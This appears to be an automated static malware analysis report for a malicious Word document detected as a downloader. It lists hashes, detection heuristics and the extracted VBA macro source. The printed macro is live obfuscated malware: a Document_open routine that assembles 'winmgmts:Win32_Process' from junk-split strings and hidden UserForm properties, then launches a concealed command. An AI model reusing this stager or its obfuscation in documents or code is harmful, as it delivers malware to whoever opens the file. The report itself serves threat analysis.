Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4238edf14ccf44a8…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 201.2 KB
Created: 2019-12-19 01:42:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: 8bbbb2cd9a3faf5a87c2134bc3d57c73
SHA-1: 7547bdf060db8cd399e789a3a950ef7ead505f96
SHA-256: 4238edf14ccf44a8a708783b65c26e4d0e184161c45bb4e4444b1d656ac234ae
Risk score: 232

Heuristics (8)

  • ClamAV: Doc.Downloader.Sagent-7465099-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Sagent-7465099-0
  • VBA macros detected (severity: medium; 4 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager (severity: critical; rule: OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Gmrruxtnv = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Bhhujcbq.Guqlecwzw + "rocess"
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    The macro calls CreateObject to instantiate a COM object.
    Matched line in script
    Set Htnnhzcl = VBA.CreateObject(JJKBSKJ + Gmrruxtnv)
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN)
    The document defines a Document_Open auto-execution entry point.
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11036 bytes
SHA-256: a70c818013bc4aa9e164ecbb4ba43e0ffe40f72bacf7186788ebab95c41222ef
Detection
ClamAV: No threats found
Obfuscation or payload: likely
301 of 514 identifiers look randomly generated (e.g. 'Xbsfnwonrotla') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Bhhujcbq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Guqlecwzw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Wqhxgpmwiqeve = Xbbotshmi
Vqsdhzec = 396
Oabjzfnve = ("Eos.")
Ueivmgxho = (656)
Dim Getvdfjfrbwzj As String
Dim Ftnurdovblkhv As Boolean
Dim Vneptxpeb As Integer
Dim Zlfyfyvmbd As Boolean
Dim Murjsktxomjg As Integer
Dim Uhcppmnfedqc As Integer
Dim Mirdburubo As Boolean
Hjxnbypjenkm = (583)
Dim Ghqnsqdil As Boolean
Gfodafnsvedh = ("Est tempora recusandae.")
Rmwgyyfo = (909)
Dim Jenvgqyystu As String
Feiwttcc = Lbdhbngorlatv
Leffoxhylqcq = Vqljecudjx
Edialiqeio = "Ut laborum asperiores adipisci neque aut voluptas."
Lbddsqzxecwup = 293
   Rnjpdlae = Vnsbliid
Wavrxtqcsvtq = 61
Fnpnynpxyb = ("Amelia")
Byrvyori = (925)
Dim Ssskuxmtkfr As Integer
Dim Ysvelcyctcvr As String
Dim Wxeznfpvxv As Double
Dim Rkeqjjvdtccj As Boolean
Dim Ioyqwtdmq As String
Dim Geagdvaqt As String
Dim Ycsmvoruvvt As String
Bwgyuoeuildfv = (180)
Dim Gcsmvuqwxkx As Integer
Vaknwdegpbve = ("Earum.")
Prohaqansdgm = (320)
Dim Aioxzjyibq As Boolean
Sjrbwhpaaej = Yvihggjatggmy
Uhqyyjyqvrgzx = Vzlaaoqauk
Ydloycsgtok = "Iste rerum adipisci fuga."
Aenqahmzjlg = 172
   Xbsfnwonrotla = Kttpxxvjlnj
Yuteibyzsgn = 967
Rztfitowi = ("Est.")
Ktccsgrehypxv = (521)
Dim Yrrrmfbq As Boolean
Dim Pgfpatpmuuozw As String
Dim Pjghccyqeu As Boolean
Dim Qvticvfca As Integer
Dim Hfzkavpzukf As Boolean
Dim Vjeurqavdnzr As String
Dim Ldqeldvzcc As Double
Upucvkyyntrll = (134)
Dim Sdratzjdwd As String
Tavgbdtvkabs = ("Id repudiandae dolore eum numquam voluptas.")
Cyrlftbrcvkc = (913)
Dim Llyyqqexrnqis As Double
Sbzlaxlm = Ltbyavyeukybd
Oegevxalrjtlr = Zzoaewdz
Rdxfcqyxmlsf = "Sit blanditiis ducimus."
Akhkogkhgtk = 61
Pihlzkcicga
End Sub

Attribute VB_Name = "Vyeoqakxxt"
Attribute VB_Base = "0{9073FB39-2E1C-4746-83A2-96A69A51531E}{01A1C874-C51B-4ABD-824F-0A2D001C09C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Oinarhrpwwxy"
Function Ujjteelnxf()
   Iczpkrbxsfrj = Cboniugn
Rdyqpfkuf = 738
Pxftmuoc = ("Alton")
Hogqsoqjmou = (794)
Dim Xhskinuxeham As Double
Dim Tvzrlcqkor As Integer
Dim Rtktripehmtjf As Boolean
Dim Sdhfdoewn As Boolean
Dim Jxcmsakmvanlq As Integer
Dim Abhcpmvwyhhmw As Boolean
Dim Wwgtysbuts As Boolean
Uferrmhodplx = (504)
Dim Bdfloneidre As Integer
Eygnjptbqtpq = ("Ellen")
Ujhkjjkqyph = (261)
Dim Plbnmvscqw As Double
Hrmkkpvp = Zwgvmknzrf
Eqpgcugm = Ficsxgozmon
Fgriipqevv = "Pariatur veniam beatae iste vitae ea voluptates enim."
Wvdnailglrx = 453
Ewajapcv = Bhhujcbq.Guqlecwzw
   Gwfxeyindhu = Noolpphajhbdh
Vtwkoathq = 631
Auafomnnd = ("Sequi aperiam expedita deleniti suscipit corporis inventore.")
Vthomxoeuw = (498)
Dim Sjkkfyug As Integer
Dim Hpnadtopuvli As Double
Dim Caovtmzm As Double
Dim Hwdbioinodm As Boolean
Dim Luvpebes As String
Dim Iifkznlrvo As Boolean
Dim Gqnhgmyuupjz As Double
Xwvkwyyl = (318)
Dim Cejzdlrdetne As Integer
Vrupqsyghypow = ("Alberto")
Yuvvuebdyqiy = (701)
Dim Jmtuypfdiubu As Double
Lkppglfysjist = Zitslylwuyvn
Btzifsobts = Kujmfwrijmi
Yanurlxkmq = "Vitae."
Knvhypbxvn = 938
Anrqtfgp = Ewajapcv + Vyeoqakxxt.Qvtysshpkvvk + Vyeoqakxxt.Mcgxwclnbn + Vyeoqakxxt.Raokfqzn
   Izugkvgxkaej = Fnonjqyisl
Ksmawuuv = 791
Xbrvovzmbpv = ("Alison")
Uokrwuah = (570)
Dim Kknljdjpepqpm As Double
Dim Bcigksexrrm As String
Dim Xbthodhk As Boolean
Dim Qiraqxlebo As Integer
Dim Srayffnwtxqg As Boolean
Dim Wjbioczs As Boolean
Dim Ssnzgnkyycjbg As Boolean
Bxfqsskjnbbdt = (380)
Dim Vzydgmro As Integer
Nshouudlj = ("Leo")
Ubafhjaxe = (969)
Dim Yxhjcdjmjjp As Integer
Adutgyrjm = Xyxydrql
Tkgkrabxdwfrv = Ohrgshmb
Dflissdpih = "Ut et."
Ioxqlizwgds = 196
Xuqwgcezqphh = Anrqtfgp + Vyeoqakxxt.Fppravids + Vyeoqakxxt.Kyqvjoudjwp.Factoid
   Fpbjrhfxw = Aydwqnubbt
Oyxhbwvrytub = 119
Eqrpfmaesyyq = ("Eileen")
Kayosxnkuze = (816)
Dim Lmhebvxi As String
Dim Mnarjgyjky As Boolean
Dim Yvfjdftws As String
Dim Mprltxvaf As Double
Dim Masgdevqtct As String
Dim Lyrrsohqain As Double
Dim Uempxczhjfrx As Double
Bcrdtkczvfd = (740)
Dim Zalseekjqde As Boolean
Fgctzuqzgoj = ("Quo est voluptates qui debitis.")
Qqvjglqmzhym = (477)
Dim Rfkymycfvxbg As Integer
Qtlbnjouogw = Dgzehlbztvq
Sluyiabzv = Wyeexrebtkyzw
Uhrxyufhqcaq = "Consequatur temporibus."
Rpiadhihxbbqp = 922
Ujjteelnxf = Aabasifsnt + Xuqwgcezqphh + Aabasifsnt
   Plvwvanucwrk = Qisfbndjikq
Mxgozgztfgebo = 623
Jyyktpxxolth = ("Darin")
Clfadaxwh = (696)
Dim Wvlboemw As Integer
Dim Klgbhozs As Integer
Dim Zincvyakq As Double
Dim Qggwtmvahgk As Integer
Dim Szyzvmxde As Integer
Dim Ohigpdcgk As Boolean
Dim Ezeocerwzozi As Integer
Abodzjmucild = (795)
Dim Deeysyvyuh As String
Lhnpozykpbnc = ("Erin")
Hkxwczpg = (971)
Dim Kaplabghugxe As Integer
Tmfevcrbon = Byfkdfpsfo
Kovghegcdld = Lkqdimbtqaib
Roogecst = "Odit sunt et quis minus ratione tempora."
Ltjhohpup = 577
End Function
Function Pihlzkcicga()
   Fkfzdcfhjo = Otqaceobhkii
Odklvcigxh = 300
Ltpmudstwzeca = ("Maiores alias dolorem iure quam autem culpa minus dolores et.")
Pdvbwxrnbx = (614)
Dim Nnivjoetvlvq As Boolean
Dim Iooyhlkrsdc As Boolean
Dim Btfooxkegod As Boolean
Dim Wspdhewfocy As Integer
Dim Miwuetdyczp As Boolean
Dim Ttlcakdto As String
Dim Ovxiknqh As Double
Lciljkrpuszgb = (24)
Dim Tlcnzvxq As Double
Jwuopiimh = ("Qui enim ipsa aliquam ab facilis.")
Drqalduzbit = (761)
Dim Qbotldnmn As String
Oxbekrtudlqul = Rcqtwpjoynu
Dueqlqmo = Okpzjuzhchx
Vujkeidrpc = "Qui."
Igajuazpmbj = 944
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Gmrruxtnv = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Bhhujcbq.Guqlecwzw + "rocess"
   Gjriqmdi = Mvgfnith
Dwabqbyyqep = 770
Eocxbjzaho = ("Nesciunt.")
Pcdohakrbzj = (199)
Dim Spofsaovkbq As Double
Dim Rxcmvhqmby As Double
Dim Idfzjffshj As Integer
Dim Vonvseamdw As Boolean
Dim Podbsdrqtu As Integer
Dim Ivbwlsdidrrht As Integer
Dim Wxigmutkubdz As Double
Dsaeqmxcdbkt = (855)
Dim Xxwhxkusk As String
Cpkhvitypazqc = ("Laudantium rerum fugiat consequatur.")
Wtthvttlnx = (101)
Dim Cuxkhmhoxmvi As String
Uliygueonbyd = Jdxkqnqer
Evolkxlodyhd = Lqogwmdtcft
Sfapttgcyp = "Veniam."
Dnpofbai = 926
Set Htnnhzcl = VBA.CreateObject(JJKBSKJ + Gmrruxtnv)
   Kuohwvlsn = Ksxohhfx
Lmzoabarlw = 821
Kjlkwuuiyiwus = ("Sean")
Pamttfvz = (153)
Dim Twtlabnlnhn As String
Dim Kldnldpewyxkr As String
Dim Vrpjdwdy As String
Dim Ygijeuqneciqr As Integer
Dim Sjxyvbjclqvsd As Integer
Dim Hncqnwgv As Double
Dim Hwnxtezg As Boolean
Mgaevoexsj = (697)
Dim Odvvnbvalo As Double
Oevfrlwmqnna = ("Cupiditate ea.")
Vyrjciauhjbyr = (236)
Dim Nyyafqrtzf As Integer
Qwapuipgxi = Xttwmdtuyb
Pahhdfsevvk = Thpcsmewm
Wugwlmootl = "Necessitatibus ipsum impedit et sed."
Bhcrqypcjvps = 580
Ndmpnxhpe = Gmrruxtnv + Vyeoqakxxt.Wmavoqxmgboj.ControlTipText + Vyeoqakxxt.Nrjoictfpsbhb.ControlTipText
   Pusxrfkyrv = Qjzvswqisc
Yusqcpucz = 250
Asrhrydexulf = ("Nostrum eum.")
Wxizbsnhkyxm = (789)
Dim Cbkmxoycbpzjp As Boolean
Dim Nmozvgrmdya As String
Dim Isjeehcwjzid As String
Dim Wszrcorxljnz As Boolean
Dim Phoxheuigv As Integer
Dim Wtdnfvymv As String
Dim Gxsclgar As Boolean
Rgcklwszome = (822)
Dim Sytydradpwdh As Boolean
Cjbfdarembc = ("Qui facere distinctio alias aut unde voluptate ipsam.")
Gmhgzudzdriwa = (434)
Dim Ckydlhqqmga As Integer
Olrvirtq = Dmwpyrtidwd
Czjrqwua = Alranoikwu
Qprrysxxoynj = "Quas."
Zzdunofcvehr = 282
Vukrttxfex = Ndmpnxhpe + Bhhujcbq.Guqlecwzw
   Hjbxxozmhbpse = Funeqkpubkv
Ycggobfg = 47
Bkrxjdomevoa = ("Praesentium minima dolor iste voluptate consequatur porro quidem quaerat molestias.")
Gqospanbk = (582)
Dim Fvjedhirbmu As Integer
Dim Frnxrjlyaa As String
Dim Mnqofzzsjeiei As Boolean
Dim Gjztmrbmymp As Boolean
Dim Nqeukgqu As Integer
Dim Wnugdaii As Double
Dim Vfoahmgkasb As Integer
Yftzoucltog = (866)
Dim Rkympebvf As Integer
Emxzftzb = ("Qui vel id quae atque quam rem repellat eaque.")
Vbkbunmecqixb = (680)
Dim Mocxossxsvbwc As Integer
Pfxgvjnkvqpqd = Glcesewdrgde
Tqjydbdzv = Zdhhzbpfzo
Ymusbgaseufb = "Blanditiis assumenda."
Szqphqert = 165
Set Pihlzkcicga = CreateObject(Vukrttxfex)
   Rxequqqb = Tfuvrmbdriwxh
Bjyqybkpapfo = 721
Foxseidnji = ("Jacob")
Dfkhuqswsgslj = (601)
Dim Puglyctluz As Boolean
Dim Dqoaqzbx As Integer
Dim Supwcrzvm As Boolean
Dim Zntcwtvkuq As Double
Dim Nogdgclixdl As String
Dim Vbzblynxtd As Double
Dim Xtgfnkolgciw As Double
Tazmvcrrbrvj = (674)
Dim Uqtkeijifckt As Boolean
Fstcnsenyhi = ("Jeanette")
Fsokdbvq = (566)
Dim Xsfjluwbc As Integer
Miysvpng = Ceedqrsgsb
Kvkhjtscffu = Jqrilijxvvob
Ddvkebwyciog = "Fugit dicta dicta."
Phwjbjgaayg = 10
Pihlzkcicga.XSize = False
   Xklvlkol = Attzmwskefew
Ktoywvtldgehl = 174
Nxpozpsz = ("Laborum dolores.")
Wdxwozbspksv = (888)
Dim Zzpqnvekwgr As Double
Dim Htgsuldaswo As Double
Dim Cpwllrhbp As Boolean
Dim Blhplgqegkuzi As String
Dim Klngdabgspnlv As Integer
Dim Orthqido As String
Dim Fjhwiposng As String
Iwyzfpaxvve = (760)
Dim Cgbcphxyuxquj As Double
Zshteaiwiqcnn = ("Eaque ut eligendi quis.")
Kfbzgjmqxzx = (244)
Dim Zhfwfaxcnlb As String
Ktmntkhenlsj = Ncktgluwakg
Towtaemztd = Nhjmvnmbl
Dsujynsbglxnp = "Ratione voluptates."
Sfrqtyznselk = 71
Pihlzkcicga.YSize = False
   Mcaiommgwkw = Fzecguzoptrq
Kgicteuavqhg = 731
Spyzawtee = ("Deleniti magnam.")
Avzxijsytban = (528)
Dim Aaedouzs As Integer
Dim Avrqtzgcxjtiu As Double
Dim Hphjdsbqwz As Double
Dim Aqpticdxmrc As Double
Dim Vxpxjsfcrgfr As Boolean
Dim Dyeuqxkfmhp As String
Dim Qfzpncohv As Integer
Nhqmjjkbzmaz = (324)
Dim Likqkhhxmowrr As String
Uiimlhjgxwd = ("Pariatur laboriosam.")
Ltqgrsbterl = (554)
Dim Pubqrsrmee As Integer
Wpcbmugktm = Payrvpqxharof
Lgbgpztvd = Sxeurdcdaqtz
Nuewxowepvd = "Qui in laudantium dolor."
Cyweutdxt = 482
Do While Htnnhzcl.Create(UJNDB & Ujjteelnxf, Mfwatbva, Pihlzkcicga, Tpxiznofetm)
Loop
   Kxfhjrufs = Vzlwjnsqktrah
Edpfolfu = 554
Stymdgeu = ("Omnis voluptate quia voluptas.")
Itxjxgumnsxx = (742)
Dim Mrpnamqed As String
Dim Ttegmngfcvl As String
Dim Ihrshofuh As String
Dim Mrqtocepdsdnp As Double
Dim Frsjjali As Integer
Dim Uxwpoxmzfuvw As Integer
Dim Zrvbneucmgj As String
Ykyailbu = (866)
Dim Apvrnklfi As Integer
Ksfjvays = ("Qui laborum ratione.")
Fzvopgtmllw = (431)
Dim Vmsngsbabj As String
Strnkccuqup = Yerswteq
Xcnszipequ = Mczaiuytawski
Iepwxkjtlx = "Henrietta"
Mbqygcar = 378
End Function